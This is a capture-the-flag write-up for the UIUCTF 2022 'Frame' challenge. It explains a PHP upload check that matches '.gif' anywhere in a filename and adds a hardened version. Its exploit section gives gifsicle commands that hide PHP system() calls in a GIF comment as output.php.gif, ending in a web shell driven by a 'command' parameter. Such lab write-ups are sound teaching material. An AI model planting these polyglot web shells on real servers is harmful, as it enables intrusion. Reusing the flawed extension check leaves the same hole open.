# UIUCTF 2022

## Frame

### [source](https://github.com/GiongfNef/ChallFile/blob/main/UIUCTF2022/frame/handout.tar)

![chall](/files/bJZXabmc8FLmCfMTllFF)

### Analysis

```
<?php
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);

if (isset($_POST["submit"])) {
  $allowed_extensions = array(".jpg", ".jpeg", ".png", ".gif");
  $filename = $_FILES["fileToUpload"]["name"];
  $tmpname = $_FILES["fileToUpload"]["tmp_name"];
  // The client-supplied name (with all of its extensions) is kept in the stored path
  $target_file = "uploads/" . bin2hex(random_bytes(8)) . "-" . basename($filename);

  $has_extension = false;
  foreach ($allowed_extensions as $extension) {
    // strpos() matches the extension anywhere in the name, not only at the end
    if (strpos(strtolower($filename), $extension) !== false) {
      $has_extension = true;
    }
  }

  if ($_FILES["fileToUpload"]["size"] < 2000000) {
    // getimagesize() only requires a valid image header
    if (getimagesize($tmpname) && $has_extension) {
      if (move_uploaded_file($tmpname, $target_file)) {
        echo "<div id='frame'><img src='$target_file' alt='Your image failed to load :(' id='submission'></div>";
      } else {
        echo "There was an error uploading your file. Please contact an admin.";
      }
    } else {
      echo "Your picture is not a picture and could not be framed.";
    }
  } else {
    echo "Your picture is too large for us to process.";
  }
}
?>
```

* The upload check uses `$allowed_extensions = array(".jpg", ".jpeg", ".png", ".gif");` and only tests with `strpos` whether one of these strings appears somewhere in the filename, so a name containing `.gif` is accepted. Searching around, I found [this doc](https://doddsecurity.com/94/remote-code-execution-in-the-avatars/).
* We can use `gifsicle` to embed PHP code that runs a Linux command into a malicious image named `output.php.gif`.
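
The check above next to a hardened alternative, as an added example that is not part of the challenge handout. The function names `handout_check` and `safe_target` are hypothetical, and the GIF bytes are a constructed sample with an inert comment.

```php
<?php
// Added example; function names are hypothetical and not from the handout.

// The handout's test: true if an allowed extension appears ANYWHERE in the name.
function handout_check(string $filename): bool {
    foreach ([".jpg", ".jpeg", ".png", ".gif"] as $extension) {
        if (strpos(strtolower($filename), $extension) !== false) {
            return true;
        }
    }
    return false;
}

// Hardened: ignore the client-supplied name entirely. The type comes from the
// file content, and the stored name gets exactly one server-chosen extension.
function safe_target(string $tmpname, string $dir = "uploads/"): ?string {
    $by_type = [IMAGETYPE_JPEG => "jpg", IMAGETYPE_PNG => "png", IMAGETYPE_GIF => "gif"];
    $info = @getimagesize($tmpname);
    if ($info === false || !isset($by_type[$info[2]])) {
        return null; // not one of the accepted image types
    }
    return $dir . bin2hex(random_bytes(16)) . "." . $by_type[$info[2]];
}

// Constructed sample: minimal 1x1 GIF with a comment block holding an inert PHP tag.
$comment = "<?php /* marker */ ?>";
$gif = "GIF89a\x01\x00\x01\x00\x80\x00\x00" . "\x00\x00\x00\xff\xff\xff"
     . "\x21\xfe" . chr(strlen($comment)) . $comment . "\x00" . "\x3b";
$tmp = tempnam(sys_get_temp_dir(), "up");
file_put_contents($tmp, $gif);

// Every name passes the handout check; the hardened path never reuses any of them.
foreach (["photo.gif", "output.php.gif", "notes.gif.txt"] as $name) {
    printf("%-15s handout_check=%-5s stored_as=%s\n", $name,
        var_export(handout_check($name), true), safe_target($tmp) ?? "rejected");
}
unlink($tmp);
```

The stored file still contains the comment bytes, so the upload directory should also be served with script execution disabled.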

### Exploit

#### First way

* First, we convert the PNG file that we received from the challenge to a GIF file.
* I tried just changing the file extension from png to gif, but that doesn't work, of course.

![](/files/VEDfirfrKflOKJypVTXb)

* I converted it with an [online tool](https://cloudconvert.com/png-to-gif) and ... that works. After that, we just use this command:

```
gifsicle < frame-1.gif --comment "<?php system('id'); ?>" > output.php.gif
```

* Upload the output gif to server:

![the path of our requesting](/files/qLph441SRcwb546K1dsF)

Go to that path and we get some interesting things:

![](/files/0NV0znj5Satw30dGF8lu)

* It works, so we try other commands for RCE:

```
gifsicle < frame-1.gif --comment "<?php system('ls /'); ?>" > output.php.gif
```

![Here yah gooooo](/files/5eor1xzQfXHvMn0m0mUG)

* Now just use an RCE command to get the flag:

```
gifsicle < frame-1.gif --comment "<?php system('cd / && cat flag'); ?>" > output.php.gif
```

![](/files/eAZMdieb0x7KIbZyCyPP)

The flag is inside some confusing output like this:

![](/files/372epmXfQZAS9koYAuGE)

#### First way, but easier \~

```
gifsicle < frame-1.gif --comment '<?php echo system($_GET["command"]); ?>' > output.php.gif
```

Now we can get RCE easily through a web shell:

> /uploads/c654036b5974c786-output.php.gif?command=ls%20-a

![](/files/v23oUZXkckKC6qqJQptx)

Thanks for reading. Have a good day :heart: !

